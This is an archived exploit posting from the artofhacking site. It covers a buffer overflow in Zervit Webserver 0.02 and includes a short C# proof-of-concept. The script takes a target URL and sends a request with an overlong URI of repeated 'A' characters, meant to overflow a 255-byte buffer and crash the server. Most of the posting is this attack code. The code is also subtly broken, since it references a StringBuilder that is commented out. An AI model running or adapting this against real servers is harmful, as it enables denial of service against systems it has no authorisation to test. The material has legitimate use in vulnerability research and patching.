AOH :: HP Unsorted Z :: VA3168.HTM

Zervit Webserver Buffer Overflow



Zervit Webserver Buffer Overflow
Zervit Webserver Buffer Overflow



#######  Zervit Webserver 0.02  Buffer Overflow =0D
=0D
########## By:      e.wiZz!=0D
=0D
#########Site: www.balcansecurity.com=0D 
=0D
=0D
######## Found with ServMeNot (world's sexiest fuzzer :P )=0D
=0D
=0D
=0D
In the wild...=0D
=0D
########################################################################################=0D
=0D
######Vend0r site: http://www.ohloh.net/projects/mereo=0D 
=0D
=0D
/* When requested uri isn't found,it goes to char tmp[255],=0D
and later it is used to output,you need 256 chars to overflow (check source "http.c") */=0D
=0D
using System;=0D
using System.IO;=0D
using System.Net;=0D
using System.Text;=0D
=0D
class whatsoever=0D
{=0D
    static void Main()=0D
    {=0D
        // StringBuilder sb = new StringBuilder();=0D
=0D
        //byte[] buf = new byte[8192];=0D
=0D
Console.WriteLine("Enter site: (http://localhost)");=0D 
        string sajt = Console.ReadLine();=0D
        string uribad = "/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";=0D
        HttpWebRequest request = (HttpWebRequest)=0D
           =0D
            WebRequest.Create(sajt+uribad);=0D
=0D
        HttpWebResponse response = (HttpWebResponse)=0D
            request.GetResponse();=0D
        // you shouldn't see response=0D
        Console.WriteLine(sb.ToString());=0D
    }=0D
}=0D

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.